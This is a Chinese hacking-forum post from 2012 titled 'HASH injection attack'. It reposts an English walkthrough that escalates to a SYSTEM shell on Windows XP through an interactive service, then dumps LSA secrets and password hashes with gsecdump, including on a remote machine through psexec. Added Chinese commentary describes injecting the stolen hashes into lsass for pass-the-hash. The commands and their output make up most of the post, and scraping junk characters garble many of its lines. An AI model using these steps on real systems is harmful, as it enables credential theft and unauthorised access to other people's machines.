中国网络渗透测试联盟

标题: HASH注入式攻击 [打印本页]
作者: admin    时间: 2012-11-6 21:09
标题: HASH注入式攻击
o get a DOS Prompt as NT system:# m- C! m4 E; P9 o" |, M2 V& m$ _$ Y

/ q& |8 {. C8 w3 V& Q9 e4 }C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact) h: H% g6 I3 F
[SC] CreateService SUCCESS
$ t9 X- {+ S% [( p* R5 E
1 |/ y& m5 X" L& b/ KC:\>sc start shellcmdline8 i& Z1 r: [" K: q5 p* P
[SC] StartService FAILED 1053:
+ d" u% q& F9 M1 t
. j4 [3 h' |3 V% b, [9 Q  qThe service did not respond to the start or control request in a timely fashion.1 ]& r5 q6 k* r- _  R0 C

! T4 I( f) y+ iC:\>sc delete shellcmdline' s8 i7 ?# h0 W# |, |. ~
[SC] DeleteService SUCCESS
1 Y5 E% |0 J& ^( s: p/ M1 s0 S! I+ @$ b6 b# d
------------" o" ?, T; J8 r* S% k
% }8 u  ?" X: g
Then in the new DOS window:' B! v( q8 [: N- `
- R# T9 i+ T& e: x2 w
Microsoft Windows XP [Version 5.1.2600]; s, C! ~4 y! e' a3 k% E, |
(C) Copyright 1985-2001 Microsoft Corp.
& y7 ~$ l# s  N
3 v7 s2 c# Y/ j$ T" `/ GC:\WINDOWS\system32>whoami
0 G7 P2 F# v5 w/ g/ dNT AUTHORITY\SYSTEM
4 Z8 }$ i1 {; v: s- f: ^
9 d# Z1 f0 n0 OC:\WINDOWS\system32>gsecdump -h% [7 m; Q  `. i9 Q$ \! ?
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
" A, G! ]9 i7 Q2 f3 cusage: gsecdump [options]3 A& I6 X3 U3 U. p$ A
- W5 C% d8 {8 O- \: Q
options:3 f  z8 S% C- {" h* p: Y( e
-h [ --help ] show help4 ?# O  o# F3 ~9 j+ D
-a [ --dump_all ] dump all secrets
& S" X7 c: D- E/ U-l [ --dump_lsa ] dump lsa secrets" s# Q1 A6 A! n9 c: }( d% U. I
-w [ --dump_wireless ] dump microsoft wireless connections
1 _( _9 |+ N  j, M4 Z+ B8 I-u [ --dump_usedhashes ] dump hashes from active logon sessions
+ R# X& V& w. Y% H) b/ E7 H-s [ --dump_hashes ] dump hashes from SAM/AD  u' }& V! T- i$ V6 E0 {, }, S3 |

8 o; Y3 _2 T6 TAlthough I like to use:
* p1 o  w* f. w, p* B  e7 I  ]* d0 y5 K5 a* W
PsExec v1.83 - Execute processes remotely: J2 d0 l4 G' }+ \/ U# ~8 Z
Copyright (C) 2001-2007 Mark Russinovich; Z0 B/ T3 \. C2 f: x9 g
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
: u4 n& |' `0 O8 K5 G3 `& `( n) L% d% V% z2 B; d
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT8 w8 H! r5 k+ p' J0 g/ O; D# w1 G

4 V$ a# D% d4 Q7 r& q4 a% Hto get the hashes from active logon sessions of a remote system.
: D1 M4 G( Y* n6 S+ V
8 p9 ^# `6 O/ F. V/ _2 ]2 N2 hThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.! R9 K! Z( @, E$ K" ]: B! I) F

" e  a$ w( n9 E: \+ y) s( N" W) @提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
8 s( j! X5 C4 Q1 K  }: H' B3 D$ k原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
( g9 d4 R5 o7 ]- ?& R  s* J+ h8 Y) m1 C5 o$ F6 u9 }) }
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
9 T0 c& h3 w1 x5 c; X7 H/ \$ X9 A



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2